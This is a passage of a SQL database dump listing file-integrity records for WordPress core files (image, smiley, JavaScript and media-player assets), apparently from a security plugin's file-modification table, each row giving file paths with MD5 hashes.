(0x90a755cc9b092743d4bbf1bacfdaab1a, 'wp-includes/images/admin-bar-sprite.png', 1, 0x00000000000000000000000000000000, 0x62834b32c7fff8e341ed4b77292a4555),
(0x72e95fe8062f99cd48473dcd25973cba, 'wp-includes/images/arrow-pointer-blue-2x.png', 1, 0x00000000000000000000000000000000, 0x431a3e3d7139b7a17b7663c02246445d),
(0x40809ecc98398a23af4cc379280bd0da, 'wp-includes/images/arrow-pointer-blue.png', 1, 0x00000000000000000000000000000000, 0x779ffc62e3ce872a4cabb2c35bbb14f9),
(0xe647c4c50635d840e6e8d9da303795c7, 'wp-includes/images/blank.gif', 1, 0x00000000000000000000000000000000, 0x6d22e4f2d2057c6e8d6fab098e76e80f),
(0x0ecd3e12ff4dd20538b820d9b5add17c, 'wp-includes/images/crystal/archive.png', 1, 0x00000000000000000000000000000000, 0xfbaa067099eb73e2dcecb3f29033e0fa),
(0xf44a1b1427238982724e8430610dc87f, 'wp-includes/images/crystal/audio.png', 1, 0x00000000000000000000000000000000, 0x6b1b3153b950cb7d88b0790445892365),
(0x77a3a4ef4cfdeaa3301e9ceff05d722e, 'wp-includes/images/crystal/code.png', 1, 0x00000000000000000000000000000000, 0x1460ef31b2cffaef1cb012f531ae391f),
(0x94f4a89621deaca9c4dfb3c20cc1ab70, 'wp-includes/images/crystal/default.png', 1, 0x00000000000000000000000000000000, 0xfe5f6af8b942a9ed1d5754b1e0e5ea90),
(0x440c6db70abbbd7a974882c35394efef, 'wp-includes/images/crystal/document.png', 1, 0x00000000000000000000000000000000, 0x5d9bd2b7c1a6de4cd60db260705a0d4a),
(0x6a9097a3c9ff1535462b1fb8afed6f01, 'wp-includes/images/crystal/interactive.png', 1, 0x00000000000000000000000000000000, 0x534872ce342d27be12c21a24a3c960ea),
(0xccc78ab745c17696632ceed8b579535e, 'wp-includes/images/crystal/license.txt', 1, 0x00000000000000000000000000000000, 0xf01b121b601cac57c42110e8d2fc7e32),
(0x5e7fe583c390aff088af2b85797cd008, 'wp-includes/images/crystal/spreadsheet.png', 1, 0x00000000000000000000000000000000, 0xb0b5df1b422cc9300b05604a7a71b06c),
(0xbc18acf0e0c4161fcdef22a652d1c59c, 'wp-includes/images/crystal/text.png', 1, 0x00000000000000000000000000000000, 0x681932d1f666acaa97582ecb22309011),
(0x55c3e5e0240b692275c2ca26cbf4b839, 'wp-includes/images/crystal/video.png', 1, 0x00000000000000000000000000000000, 0x94010edbfd8e6ca589daa4b83bf53d0b),
(0x2aaee42d3310f675ac8d45c25bd54f23, 'wp-includes/images/down_arrow-2x.gif', 1, 0x00000000000000000000000000000000, 0xe52496d9eecd561f7c6d964acb0a5a73),
(0x1d0a9cdf4f825f98ab3b5d2f5e990ce7, 'wp-includes/images/down_arrow.gif', 1, 0x00000000000000000000000000000000, 0x7bbbc00f708a791dc4e674f9e21aa2ca),
(0xd29eb3e5faecc79ff603094b73cdd7d0, 'wp-includes/images/icon-pointer-flag-2x.png', 1, 0x00000000000000000000000000000000, 0xa9e5e1a632f1b3b962e4c426d55acc72),
(0xd65ad7f6097221de8f66d5d11cbe09de, 'wp-includes/images/icon-pointer-flag.png', 1, 0x00000000000000000000000000000000, 0xb0d32c87f2ad8bc2455ebf6a60171027),
(0xd96befdb2f799eb3a9fd9b2689139f47, 'wp-includes/images/rss-2x.png', 1, 0x00000000000000000000000000000000, 0xc71759615ba051c1e6f597fd726a9d11),
(0xdbc872819abcc1b5d8811d3dd4d492e9, 'wp-includes/images/rss.png', 1, 0x00000000000000000000000000000000, 0xa5b05bbf28f294b02efd942a4e5ab806),
(0xd0a27f92ed8eb9827ce18ed1e4d84019, 'wp-includes/images/smilies/icon_arrow.gif', 1, 0x00000000000000000000000000000000, 0x394bffa679f650b7d2f22aa263cc06ba),
(0xefe3afa9e8090e27afe6b6dea88bf756, 'wp-includes/images/smilies/icon_biggrin.gif', 1, 0x00000000000000000000000000000000, 0xf970a6591668c625e4b9dbd3b7a450d7),
(0xb024e5cd9399016212486eae802c002d, 'wp-includes/images/smilies/icon_confused.gif', 1, 0x00000000000000000000000000000000, 0x4affed1b55e5f73c9f0675ae7d0ad823),
(0x582ce745f5436a245f83ac3849a78230, 'wp-includes/images/smilies/icon_cool.gif', 1, 0x00000000000000000000000000000000, 0x25c83ea511f206e88f214719dad9c88c),
(0xc494d4bcfcdd7fd57050885a094890b4, 'wp-includes/images/smilies/icon_cry.gif', 1, 0x00000000000000000000000000000000, 0x7605eca95aaeda46e641745ef6f0e0b0),
(0x215f8d039fe8bcb5703370996ed7d34c, 'wp-includes/images/smilies/icon_eek.gif', 1, 0x00000000000000000000000000000000, 0x52e43743e38a67d5d28845a104ca8c7d),
(0xc2024f6263aeb32220cec7db7c064a28, 'wp-includes/images/smilies/icon_evil.gif', 1, 0x00000000000000000000000000000000, 0x178255bb3fe2c3aa790c1f8ec8738504),
(0x9a4a9e8b42be4754b23b2c6ca3c0540e, 'wp-includes/images/smilies/icon_exclaim.gif', 1, 0x00000000000000000000000000000000, 0xda86bbf377f97d06047aa781a582c52f),
(0xc82275409eb354ac7f8514539bf135f2, 'wp-includes/images/smilies/icon_idea.gif', 1, 0x00000000000000000000000000000000, 0xaaebc9c048367118ba65e1da46bc3e08),
(0x9e20c16e80249b877188ef5e7166b4a7, 'wp-includes/images/smilies/icon_lol.gif', 1, 0x00000000000000000000000000000000, 0xb76e7729d43c4a49182d020741285bef),
(0x8e28a2fb8fd794ef1d57e5681c403d61, 'wp-includes/images/smilies/icon_mad.gif', 1, 0x00000000000000000000000000000000, 0xe4355c00894da1bd78341a6b54d20b56),
(0x1afd5545e47328eeb1f79e231545f670, 'wp-includes/images/smilies/icon_mrgreen.gif', 1, 0x00000000000000000000000000000000, 0x54e8505227edae1e583cf2f9554abc3a),
(0xffc4ea6bb5cb69eed02ebca5b85ca593, 'wp-includes/images/smilies/icon_neutral.gif', 1, 0x00000000000000000000000000000000, 0x4e8b7a51c7f60a2362a4f67fbbc937e7),
(0x9aa58f37b8134d33c29ae3241ccbf48c, 'wp-includes/images/smilies/icon_question.gif', 1, 0x00000000000000000000000000000000, 0x0518596a4eb94c32a2b2ed898bdc3549),
(0xa692affc9e3a5b2662fa5bae6859a9b8, 'wp-includes/images/smilies/icon_razz.gif', 1, 0x00000000000000000000000000000000, 0x7aec68426aa06f01e2b1ac250e5aee62),
(0x24921084f5b330530f0d9872fe02aea9, 'wp-includes/images/smilies/icon_redface.gif', 1, 0x00000000000000000000000000000000, 0xd7e9d095432cbcf09375ffc782c30c23),
(0x89bc421e155d6ec884a838da376798f3, 'wp-includes/images/smilies/icon_rolleyes.gif', 1, 0x00000000000000000000000000000000, 0x19071b1af987946e96dcef6ce0611c6b),
(0xa8488aa3f5c19c5077e015f0253896c0, 'wp-includes/images/smilies/icon_sad.gif', 1, 0x00000000000000000000000000000000, 0x5a50535a06def9d01076772e5e9d235b),
(0x80f706eaff65d8070ee63937e3614a53, 'wp-includes/images/smilies/icon_smile.gif', 1, 0x00000000000000000000000000000000, 0x9ee646ffab71107d1a11407be52f33a5),
(0x3bf1576374d4d3e72a2bf7ac427216ca, 'wp-includes/images/smilies/icon_surprised.gif', 1, 0x00000000000000000000000000000000, 0xae735b5dd659dc4b3b0f249ce59bef79),
(0x878e5c013ae2c3da887fd5ea29672c5c, 'wp-includes/images/smilies/icon_twisted.gif', 1, 0x00000000000000000000000000000000, 0xc9c3d12da1e9da699e490b86d24eee85),
(0x9c3883a98e85a6ace3503561c4a89d09, 'wp-includes/images/smilies/icon_wink.gif', 1, 0x00000000000000000000000000000000, 0xf058206bb8ff732dbe8e7aa10d74c9cd),
(0x7d08c4893d9574a9adf291bb0113a4b9, 'wp-includes/images/toggle-arrow-2x.png', 1, 0x00000000000000000000000000000000, 0x46cae1ca5cf883f4c91243447215ef11),
(0x94dcb55b0fd2b26d258936f253383a44, 'wp-includes/images/toggle-arrow.png', 1, 0x00000000000000000000000000000000, 0x8e9022f98e990584452838f85d77c928),
(0x2fe9b9a0ecc4efceb01f31ca697787a7, 'wp-includes/images/uploader-icons-2x.png', 1, 0x00000000000000000000000000000000, 0xef35cb53941bef570b89317c4fba357c),
(0x5fd6e08134e4813393cdcb13193d8e93, 'wp-includes/images/uploader-icons.png', 1, 0x00000000000000000000000000000000, 0x707b402719c2a935cc7106b1b60bffee),
(0x95688f9789a7914601755165f1aa20ee, 'wp-includes/images/wlw/wp-comments.png', 1, 0x00000000000000000000000000000000, 0x4cc2365d0450dedec30cec2e73a8a1d4),
(0xf6fde58dc0501c712db374f3b9406cca, 'wp-includes/images/wlw/wp-icon.png', 1, 0x00000000000000000000000000000000, 0x311d098eca9a89370877334b1b8f992a),
(0xa7e8e1fab0369190629d67b73e5faa1b, 'wp-includes/images/wlw/wp-watermark.png', 1, 0x00000000000000000000000000000000, 0x708ebef70c64f23294d63347ececebe7),
(0xb30c7ea39ab9ad55f722d0269018d005, 'wp-includes/images/wpicons-2x.png', 1, 0x00000000000000000000000000000000, 0xe7792025943f6c6f219e566bf2f79aa9),
(0x679424475cbeebb13ba972c4c4cf3158, 'wp-includes/images/wpicons.png', 1, 0x00000000000000000000000000000000, 0x90dd81a3ac5697aca79a34a9b1bfa8fa),
(0x3dcc4043c6471a12a891affe51bbdeeb, 'wp-includes/images/wpmini-blue-2x.png', 1, 0x00000000000000000000000000000000, 0x13e7ab1ac2f6c77f177c849576bfdf31),
(0x974d2a6e28e9a4644e1428db8c64309b, 'wp-includes/images/wpmini-blue.png', 1, 0x00000000000000000000000000000000, 0xe8d9359697813d9df251808ec4b58b71),
(0xae0d45f61cc855cf0e9cf8cd84ded91c, 'wp-includes/images/wpspin-2x.gif', 1, 0x00000000000000000000000000000000, 0x450b52bd860e667a0fa3c00b82b58a18),
(0x529678ae344d7040b039750ad68a2070, 'wp-includes/images/wpspin.gif', 1, 0x00000000000000000000000000000000, 0x67f40a30bfa13743e5c4e86bfa467a90),
(0xde4ec45cfc7c0ff3602ab72c19294034, 'wp-includes/images/xit-2x.gif', 1, 0x00000000000000000000000000000000, 0xd9a81fb5a5e21e6d74a5e81ce37b421e),
(0xfafdca0a5cd4fbc9b62e35fa108e9a19, 'wp-includes/images/xit.gif', 1, 0x00000000000000000000000000000000, 0xa815dc7ad6c4175e95bc48f3ab6832e9),
(0x7c2fda92eb005b2a3493ff7805fc01e3, 'wp-includes/js/admin-bar.js', 1, 0x00000000000000000000000000000000, 0x25692c16854d4f5fd7be2ff45a825da9),
(0x4dd0a0009a419faabb3951de2ba0cd08, 'wp-includes/js/admin-bar.min.js', 1, 0x00000000000000000000000000000000, 0x725d72af8994225dc221211cd8120e8e),
(0x5233f0b85573eb33c3c87d54ea9cdbc1, 'wp-includes/js/autosave.js', 1, 0x00000000000000000000000000000000, 0x8a6348b4b6ccb6fdc485912383cddb04),
(0x771075e89a6c7ce50cf570089816ca51, 'wp-includes/js/autosave.min.js', 1, 0x00000000000000000000000000000000, 0xd170f66997bf4dd0a595354633129133),
(0x501c45dbabbd37727c6f49b136fff03e, 'wp-includes/js/backbone.min.js', 1, 0x00000000000000000000000000000000, 0x09622714468a28bca3cac046ee92d8f6),
(0xdbdf0a70a1f11fd3476e750e3aa2b8d3, 'wp-includes/js/colorpicker.js', 1, 0x00000000000000000000000000000000, 0xf01017ca562067f4840eb2b6f99f2daf),
(0x30a4e780c54500308c82108158cf4812, 'wp-includes/js/colorpicker.min.js', 1, 0x00000000000000000000000000000000, 0x3086288f91098c51c719dc0e5874492c),
(0x705579fc6109ea62afe07661843ba138, 'wp-includes/js/comment-reply.js', 1, 0x00000000000000000000000000000000, 0x20ef5771571f1be483869066b2830c2f),
(0x31f9ce588a2fb27436305ed28021dc37, 'wp-includes/js/comment-reply.min.js', 1, 0x00000000000000000000000000000000, 0x82fe85cb67dbd02e20c183e43979f217),
(0x6259c62ca5b0cfa559aa72db9dd13bbe, 'wp-includes/js/crop/cropper.css', 1, 0x00000000000000000000000000000000, 0x6b79350bf46e0f692a4d1b2807ed0399),
(0x0dc32514db11e1e3cf25bc7953fd60f0, 'wp-includes/js/crop/cropper.js', 1, 0x00000000000000000000000000000000, 0x1d97b296d918482e1273c56fbff6a8e2),
(0xa628bc7c056ee495c1b473415246e42b, 'wp-includes/js/crop/marqueeHoriz.gif', 1, 0x00000000000000000000000000000000, 0x8cccae9c1ebafdb83be602e4d44c6f0a),
(0x5ab1001e839c5988b392b320c3a66667, 'wp-includes/js/crop/marqueeVert.gif', 1, 0x00000000000000000000000000000000, 0xae9accf100a4b9930639adff52d4dcc7),
(0xb672815cd96a0694b4a8f2e141241381, 'wp-includes/js/customize-base.js', 1, 0x00000000000000000000000000000000, 0x62f799465f3922f79057f8c1e17f123f),
(0x560a07d5c95560bd5f9a35fa98ad1b38, 'wp-includes/js/customize-base.min.js', 1, 0x00000000000000000000000000000000, 0x05b76950045388239de89bcb4043aa4a),
(0x93567dbb50949cb16d952faf7c492ad9, 'wp-includes/js/customize-loader.js', 1, 0x00000000000000000000000000000000, 0x3e18e99953ef2c5dbe445865119db950),
(0x62e094fb08bf94d28c2026e93f7fac7b, 'wp-includes/js/customize-loader.min.js', 1, 0x00000000000000000000000000000000, 0x4bbf055e4673e39953b716ac908a0abf),
(0xea34cad7e7ba3291160629412e3b34d1, 'wp-includes/js/customize-preview.js', 1, 0x00000000000000000000000000000000, 0x9100940268231265441eeec70eaad488),
(0x3e716cee2baa6d14c80035c4a622865e, 'wp-includes/js/customize-preview.min.js', 1, 0x00000000000000000000000000000000, 0x37964f44f324f359533e4ce7693e0636),
(0xdafd1221a71614287494f2893c0ed4b9, 'wp-includes/js/heartbeat.js', 1, 0x00000000000000000000000000000000, 0x8548d05cee37b20058732f38c6613fe0),
(0x8b6e393790492e4ffad29ddebff0b007, 'wp-includes/js/heartbeat.min.js', 1, 0x00000000000000000000000000000000, 0x9aae6231a46e14ac89912dba8c94625f),
(0x9179df678bed1f7a6155228309584b47, 'wp-includes/js/hoverIntent.js', 1, 0x00000000000000000000000000000000, 0x4502421f188ad9e38079741edc36e118),
(0x532e46c8ab41be7f6aaeffe428a03a05, 'wp-includes/js/hoverIntent.min.js', 1, 0x00000000000000000000000000000000, 0x6f0074f1f2d119430222bc3c0950ac2f),
(0x069397ac256251f1a3931b624d3cd678, 'wp-includes/js/imgareaselect/border-anim-h.gif', 1, 0x00000000000000000000000000000000, 0x5ac3c42cc86e745a5e36b67b4c70a134),
(0x8bba46e822f7e87668e2a1244c628e8d, 'wp-includes/js/imgareaselect/border-anim-v.gif', 1, 0x00000000000000000000000000000000, 0x20c97a21993cf137ead9fdbecbc42aa8),
(0x3c46e90febef507acc193232a387127e, 'wp-includes/js/imgareaselect/imgareaselect.css', 1, 0x00000000000000000000000000000000, 0x7d28cad92829b3d633a087b5f3b595af),
(0xd8382f42b18f24389088cf1e04606d9c, 'wp-includes/js/imgareaselect/jquery.imgareaselect.js', 1, 0x00000000000000000000000000000000, 0x55a6b7fb4b1b287497d3fc30910e97ce),
(0xd5f6bcfacda436e9002ffd936bfac0f4, 'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js', 1, 0x00000000000000000000000000000000, 0x0030d4ba4c429d776d23c2e37775873a),
(0x53582b37cafb081e311d3fc5f5cfee2d, 'wp-includes/js/jcrop/Jcrop.gif', 1, 0x00000000000000000000000000000000, 0x5a8bfd37651305bdafbcf2cd51b0254b),
(0xfc678d229a107d5fbf37b8bda6dc4a35, 'wp-includes/js/jcrop/jquery.Jcrop.min.css', 1, 0x00000000000000000000000000000000, 0x56cc9ea201dc2f4b910e78bfacac9211),
(0x54872e6f40cea832ff77f5768e9f58b9, 'wp-includes/js/jcrop/jquery.Jcrop.min.js', 1, 0x00000000000000000000000000000000, 0x2f61ab984c177275c71e34ff1a17c102),
(0x76a19610020cdea303e3fb1d7f5211ef, 'wp-includes/js/jquery/jquery-migrate.js', 1, 0x00000000000000000000000000000000, 0x90e237d5f01035b958feaf514ef27f7a),
(0xba61c9406f9bff27bfc96b62edfe0ef9, 'wp-includes/js/jquery/jquery-migrate.min.js', 1, 0x00000000000000000000000000000000, 0x512b871a2830e44259bc3ce3343afcd0),
(0xc4e0ca99007df4dfe794a04b9bf62eff, 'wp-includes/js/jquery/jquery.color.min.js', 1, 0x00000000000000000000000000000000, 0xff2db8dbf145ce47f31781eef33e764a),
(0x76fad2b8293b8f44b08d7e4a22e08f71, 'wp-includes/js/jquery/jquery.form.js', 1, 0x00000000000000000000000000000000, 0xe5afd8e41d2ec22c19932b068cd90a71),
(0x263d1a10bd2b747fed9222a22f6b270a, 'wp-includes/js/jquery/jquery.form.min.js', 1, 0x00000000000000000000000000000000, 0xdbc3808473def00fce45fe564dc72dcb),
(0x9cfe501a8dc52fe904a203af6c0e25a1, 'wp-includes/js/jquery/jquery.hotkeys.js', 1, 0x00000000000000000000000000000000, 0xa7ad102b68229e728863325d0efec72e),
(0xc5cd2d8670936c45c6f3d86b86112ff6, 'wp-includes/js/jquery/jquery.hotkeys.min.js', 1, 0x00000000000000000000000000000000, 0xe353217d4555ab5c62b367be6889813d),
(0x6723e92c764d91ff8e8b97df3a0cf5e4, 'wp-includes/js/jquery/jquery.js', 1, 0x00000000000000000000000000000000, 0x92c9ccfa9216499d48ecc11e6d9887d5),
(0x632cbd85b05b78deabf433a5060af940, 'wp-includes/js/jquery/jquery.masonry.min.js', 1, 0x00000000000000000000000000000000, 0xfc2d7669d58e909815f1994047bf671c),
(0x7b9f1f29d734653402703ab106665787, 'wp-includes/js/jquery/jquery.query.js', 1, 0x00000000000000000000000000000000, 0x3bcc587af2c7b01fc6fbc9c077050143),
(0x281588d4672500cfc334dddb6c3e9c8d, 'wp-includes/js/jquery/jquery.schedule.js', 1, 0x00000000000000000000000000000000, 0x0426b39754aa6bc766d89ea4c41bbd06),
(0x7168ff36361f3597797cf23def3f5309, 'wp-includes/js/jquery/jquery.serialize-object.js', 1, 0x00000000000000000000000000000000, 0xd15c29a18d9ffa8b9b4ae86c3c0cfa22),
(0xfc303c5073c9f1d79e480f97d1c13232, 'wp-includes/js/jquery/jquery.table-hotkeys.js', 1, 0x00000000000000000000000000000000, 0xbaa8747ae1cb2d15755733fa4f96f1b7),
(0xf2b1a0adfc1fb242c95204d47a878759, 'wp-includes/js/jquery/jquery.table-hotkeys.min.js', 1, 0x00000000000000000000000000000000, 0xe56f81676f199db7bf937e69a64909fa),
(0x6d59b7c118939a0c7d10c9bdeb0b853f, 'wp-includes/js/jquery/jquery.ui.touch-punch.js', 1, 0x00000000000000000000000000000000, 0x4cc86d1003c45134d6838f13e3885db1),
(0xc6ac2b1a96bcca1f49f3645e69203c00, 'wp-includes/js/jquery/suggest.js', 1, 0x00000000000000000000000000000000, 0x9044d9d8599a013f7c0ca8120501c188),
(0x821133a496c6876515c728c3ba39f911, 'wp-includes/js/jquery/suggest.min.js', 1, 0x00000000000000000000000000000000, 0x67bea18c057fd6c257d08e55a1090708),
(0x467b483c1a2afa0ca3aa9b9ad51189d3, 'wp-includes/js/jquery/ui/jquery.ui.accordion.min.js', 1, 0x00000000000000000000000000000000, 0x1da489eb8b596be7a49f1be959249988),
(0x836189ad6294310f694cae1965a2c4b9, 'wp-includes/js/jquery/ui/jquery.ui.autocomplete.min.js', 1, 0x00000000000000000000000000000000, 0xc6c4d43ac586574589a0ec4542a890a8),
(0xe38c116811865364ac7bec791ebd5366, 'wp-includes/js/jquery/ui/jquery.ui.button.min.js', 1, 0x00000000000000000000000000000000, 0x1cc433c88d349c513c801378c4493f19),
(0x7a52332e877b2f2476e6bea26ebb38e2, 'wp-includes/js/jquery/ui/jquery.ui.core.min.js', 1, 0x00000000000000000000000000000000, 0x739cf68f21c10e04cde3ad13fcff9063),
(0x1b29001226e1c84658d636ad2697ce4c, 'wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js', 1, 0x00000000000000000000000000000000, 0x4eac58ed8deb3189c8d05bab9187f1ce),
(0x7e86d4e48e10f9bc201a56ccf5a96e42, 'wp-includes/js/jquery/ui/jquery.ui.dialog.min.js', 1, 0x00000000000000000000000000000000, 0x3248497acc4c9a3eae7d094860937708),
(0x257d76949be29d5ba015f04bb057ff16, 'wp-includes/js/jquery/ui/jquery.ui.draggable.min.js', 1, 0x00000000000000000000000000000000, 0x67b603ea0e4abe708f871111fcf45738),
(0x5b7f42af625160f8929acefc7739afab, 'wp-includes/js/jquery/ui/jquery.ui.droppable.min.js', 1, 0x00000000000000000000000000000000, 0x79ea08a1eb866ba2039cc617ada702de),
(0xa2eb3defe63453330c8aea1c0bd10f79, 'wp-includes/js/jquery/ui/jquery.ui.effect-blind.min.js', 1, 0x00000000000000000000000000000000, 0x625c5e7376d305ce4a11fd1277de5734),
(0x95230d31915a3a67e77114220e84abdc, 'wp-includes/js/jquery/ui/jquery.ui.effect-bounce.min.js', 1, 0x00000000000000000000000000000000, 0x81ee7ab27ed9b0f3556a406ff6aad80b),
(0x7a943308a8342a79fdbdbde5d4821f9f, 'wp-includes/js/jquery/ui/jquery.ui.effect-clip.min.js', 1, 0x00000000000000000000000000000000, 0x71a13d33f3fc7de23f13adcc4593a5a2),
(0x80b2becab7f6c8ce2cc4906d2519d6f1, 'wp-includes/js/jquery/ui/jquery.ui.effect-drop.min.js', 1, 0x00000000000000000000000000000000, 0x1d045fd3777c8376972022e868891b86),
(0xdbfefc95dee7a5497718bb2b4298cc65, 'wp-includes/js/jquery/ui/jquery.ui.effect-explode.min.js', 1, 0x00000000000000000000000000000000, 0x3ae92de7419e58815544147641a87930),
(0xd1d5ca6cc05c5668fc9186a7ef803b40, 'wp-includes/js/jquery/ui/jquery.ui.effect-fade.min.js', 1, 0x00000000000000000000000000000000, 0x79debe8459f8ceca8443086bf29e16a0),
(0x65b1db62ce2c8e584c9d75ae8d9b48bf, 'wp-includes/js/jquery/ui/jquery.ui.effect-fold.min.js', 1, 0x00000000000000000000000000000000, 0xf8cda9cadd854d552cc429d799274962),
(0x4b0053d08c7a51cd32d305478b436db7, 'wp-includes/js/jquery/ui/jquery.ui.effect-highlight.min.js', 1, 0x00000000000000000000000000000000, 0x15b8d390675cf17bc3a73c3619557fb4),
(0xe61e2e89ed5d14ce7a6f5f577e6274dd, 'wp-includes/js/jquery/ui/jquery.ui.effect-pulsate.min.js', 1, 0x00000000000000000000000000000000, 0x3d639b4c14c1f6b080f746b7250554c3),
(0xecbb0f887853be02be5d92449dabab09, 'wp-includes/js/jquery/ui/jquery.ui.effect-scale.min.js', 1, 0x00000000000000000000000000000000, 0x783b0ad56b1a8a97b76079a1d41c6f88),
(0x7d0e1961f38302fbcc8ea56ffae5bdfd, 'wp-includes/js/jquery/ui/jquery.ui.effect-shake.min.js', 1, 0x00000000000000000000000000000000, 0x782fbb6948781cffd80ddf4030196952),
(0x67e9e9394bc3e929aab3642f37083f4c, 'wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js', 1, 0x00000000000000000000000000000000, 0x945300af618d04041dc49a0a5d36a917),
(0xb51ab4d9c576540c299246c08a3f1f33, 'wp-includes/js/jquery/ui/jquery.ui.effect-transfer.min.js', 1, 0x00000000000000000000000000000000, 0xe91b94a47085eac01afbf48c8cd515f0),
(0x754b80119b6e3ea944a8729fcb20e008, 'wp-includes/js/jquery/ui/jquery.ui.effect.min.js', 1, 0x00000000000000000000000000000000, 0xea7d13d6d2212ba59159c40b2a57bd3b),
(0x58871c952188fc9209380c1da5e2fba6, 'wp-includes/js/jquery/ui/jquery.ui.menu.min.js', 1, 0x00000000000000000000000000000000, 0xe0b94d0041ca790b68af39edf821d238),
(0xfc86fd927ab29ffccd9b8f006b1c16ef, 'wp-includes/js/jquery/ui/jquery.ui.mouse.min.js', 1, 0x00000000000000000000000000000000, 0x513bb6d79ab29c58ab1b32646216a3a0),
(0xb774075517c3648a43008ea3908d1def, 'wp-includes/js/jquery/ui/jquery.ui.position.min.js', 1, 0x00000000000000000000000000000000, 0xeb63c3d2dace62e102af74004ccd0ff1),
(0xed6c8caaadf107980aabd9a2d652c224, 'wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js', 1, 0x00000000000000000000000000000000, 0x35086553121b0423a8f2eaaedca79152),
(0xbc7841b4992e6c81967c4f88d0354baf, 'wp-includes/js/jquery/ui/jquery.ui.resizable.min.js', 1, 0x00000000000000000000000000000000, 0x1cca9d1d61a8a9bef77cfea0f39e793d),
(0x9f9bb7f7971fd1af5bd58de0ef6e3889, 'wp-includes/js/jquery/ui/jquery.ui.selectable.min.js', 1, 0x00000000000000000000000000000000, 0x6908d69d10dae3d04c23ca83a884ba6f),
(0x5e2cdc406e16cca524880919b326d720, 'wp-includes/js/jquery/ui/jquery.ui.slider.min.js', 1, 0x00000000000000000000000000000000, 0xf1b234712eabc4fea71eaadcf2e73ffa),
(0x4fef3388851d7d8050f3761eb12f35d5, 'wp-includes/js/jquery/ui/jquery.ui.sortable.min.js', 1, 0x00000000000000000000000000000000, 0xcccbd3de04d2ff8cd30164925353c394),
(0x615a91d1c6c560ec2015d7fd796124bc, 'wp-includes/js/jquery/ui/jquery.ui.spinner.min.js', 1, 0x00000000000000000000000000000000, 0xab6ea5b371afc02315dfaa7dfd4a1063),
(0x0af57c8d73eca8539aabad9d17884e0a, 'wp-includes/js/jquery/ui/jquery.ui.tabs.min.js', 1, 0x00000000000000000000000000000000, 0x3d531a65189ab04b164e9ac6ff708c06),
(0x65d61c5c106626d6a63abd7b2359e7b0, 'wp-includes/js/jquery/ui/jquery.ui.tooltip.min.js', 1, 0x00000000000000000000000000000000, 0x4fbdb31340b01c249a0fe5112e0eeec9),
(0x4a0ce1b71c479c6d5b7b6642e52b7791, 'wp-includes/js/jquery/ui/jquery.ui.widget.min.js', 1, 0x00000000000000000000000000000000, 0x2425a542e6dde093dd85ac0b5adc0141),
(0x2ae7101a3037d1a5314f81d3d3d98e38, 'wp-includes/js/json2.js', 1, 0x00000000000000000000000000000000, 0x74d903049683e5bbea9ccb7544a42bca),
(0xfdb4f6d7f8f529dd28a4d03c1f07d9dd, 'wp-includes/js/json2.min.js', 1, 0x00000000000000000000000000000000, 0xef4188cb0b60a72017f4c8a1e840ab1e),
(0x72e9f6107287284aaf67f728a879ad74, 'wp-includes/js/mce-view.js', 1, 0x00000000000000000000000000000000, 0x09f646383af1481207855a1eaf2d8f16),
(0xee1417890b9566d92575df50fbcaf184, 'wp-includes/js/mce-view.min.js', 1, 0x00000000000000000000000000000000, 0x40092f2fbf830be89b8c4db99c9008b0),
(0xf575f481034e90e21d832e415fd95fcf, 'wp-includes/js/media-editor.js', 1, 0x00000000000000000000000000000000, 0xc2c48681543e79a94bb97052b2515b8e),
(0x092cb9a92fd595188b21e79b6779fe64, 'wp-includes/js/media-editor.min.js', 1, 0x00000000000000000000000000000000, 0xbb3a5f53c1a46e2ae27667e82c582f79),
(0x10298f9f0c5fe6f6924aaf87d71d99d4, 'wp-includes/js/media-models.js', 1, 0x00000000000000000000000000000000, 0x0c065b544bad77fbc55a68561cf67055),
(0x82468920e5474aced642ec7f887337b5, 'wp-includes/js/media-models.min.js', 1, 0x00000000000000000000000000000000, 0xdef5272789e7da0fd60524d1ebf96a98),
(0x81c889563f09dd13de1701135dc62941, 'wp-includes/js/media-views.js', 1, 0x00000000000000000000000000000000, 0x8f9b3fcd0c47b1ba4bf54a1ed2989dd6),
(0x96c1bc0b9945983fc61d8cd0aee1bea0, 'wp-includes/js/media-views.min.js', 1, 0x00000000000000000000000000000000, 0xb2517aad471230737b19eca7939536c6),
(0x8af1ec369264f513a27813c71144c9d1, 'wp-includes/js/mediaelement/background.png', 1, 0x00000000000000000000000000000000, 0x703c659e4bf563a05c6338a1727e006c),
(0x1ab1650dd6f3e46a215eb20cb809e3f7, 'wp-includes/js/mediaelement/bigplay.png', 1, 0x00000000000000000000000000000000, 0x716436fb3df0d29e6b37dd62d952676a),
(0x37b5d84f2bb2bb1bbe0f978ac78b276e, 'wp-includes/js/mediaelement/bigplay.svg', 1, 0x00000000000000000000000000000000, 0xd71b376560d2d95d10a4017a2178d0d5),
(0xc1ea3595ec5b2c096ac42810eac6aab6, 'wp-includes/js/mediaelement/controls.png', 1, 0x00000000000000000000000000000000, 0x24a0227fbdd3acfd86ff03fc3fc6c8a4),
(0x4771dc4001affc02ddd3676de5b1aa16, 'wp-includes/js/mediaelement/controls.svg', 1, 0x00000000000000000000000000000000, 0x40f56f5a736da4effeb790cedb8a52f0),
(0x7b07c3ea9961e99d74d10a223eaac753, 'wp-includes/js/mediaelement/flashmediaelement.swf', 1, 0x00000000000000000000000000000000, 0x03dc1336e5697e4ceda3a7f4b99b71c7),
(0xe99c272018adc6237388fe19dfbe557c, 'wp-includes/js/mediaelement/loading.gif', 1, 0x00000000000000000000000000000000, 0x76b326f4d44222126fee21076595bef5),
(0x1ba779b4ddda0821a100705ae8885b41, 'wp-includes/js/mediaelement/mediaelement-and-player.min.js', 1, 0x00000000000000000000000000000000, 0x9075ef6303cc251092a0d6bfdd3a2093);
INSERT INTO `www2_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x09073fb1cfe486e6db0819997199754d, 'wp-includes/js/mediaelement/mediaelementplayer.min.css', 1, 0x00000000000000000000000000000000, 0xa7f7bdc09331cf77b0f7b820eb59f75b),
(0x0f3b8826059c6e62b1cb1969ded9b7a9, 'wp-includes/js/mediaelement/silverlightmediaelement.xap', 1, 0x00000000000000000000000000000000, 0x2fb1bc1a7f10d1dd54689a79b4cf53ac),
(0xad9d9a9553c768deebe153d025547af8, 'wp-includes/js/mediaelement/wp-mediaelement.css', 1, 0x00000000000000000000000000000000, 0xb84abcd93646dedd34ab5c0fe7ffd284),
